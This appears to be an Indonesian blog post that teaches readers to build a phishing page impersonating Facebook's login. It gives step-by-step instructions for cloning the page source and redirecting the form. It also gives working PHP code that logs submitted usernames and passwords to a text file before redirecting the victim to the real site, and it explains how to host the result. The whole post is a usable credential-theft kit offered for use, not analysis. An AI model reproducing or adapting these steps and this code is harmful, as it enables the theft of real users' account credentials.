Bagi yang ingin coba-coba tentang hack, berarti anda tepat berkunjung kesini. Saya akan mengajarkan anda bagaimana cara membuat web phising. Web phising adalah halaman web login palsu dari situs situs tertentu misalnya : facebook, twitter, blogger,dll dimana web palsu tersebut akan merekan seluruh data yang anda masukan saat login melalui web palsu tersebut. Datanya berupa email/user name dan password. Nanti data yang sudah tersadap tersebut akan di tempatkan di folder khusus. berikut cara-cara membuat webphising :
- Buka alamat situs yang akan dijadikan webphising ( disini saya menggunakan facebook )
- Pada saat sudah terbuka tekan Ctrl+U pada keyboard secara bersamaan
- Setelah anda menemukan source codenya anda salin pada notepad ( dilinux pake gedit )
- Anda ketik Ctrl+F isi dengan “action=” ( tanpa tanda petik )
NB : ingat copy dulu ke notepad
- Ganti URL web asli tersebut dengan phising.php ( seperti pada lingkaran merah )
- Ubah "POST" ( sebelah kiri URL pada gambar ) dengan "GET"
- Save as dengan ekstensi .html ( contoh index.html )
- buka notepad lalu salih code dibawah ini :
02 header("Location: <span style="color: #ff0000;">http://URL WEB ASLI"</span>);
03 $handle = fopen("<strong>passwords.txt</strong>", "a");
04 foreach($_GET as $variable => $value) {
05 fwrite($handle, $variable);
06 fwrite($handle, "=");
07 fwrite($handle, $value);
08 fwrite($handle, "\r\n");
09 }
10 fwrite($handle, "\r\n");
11 fclose($handle);
12 exit;
13 ?>
- Ganti URL WEB ASLI dengan http://www.facebook.com
- Save dengan nama phising.php
- Upload file phising.php dan phising.html ke webhosting anda. contoh : 0000webhos, ripway, dll
NB : permission di atur 777 untuk file passwords.txt
0 komentar:
Posting Komentar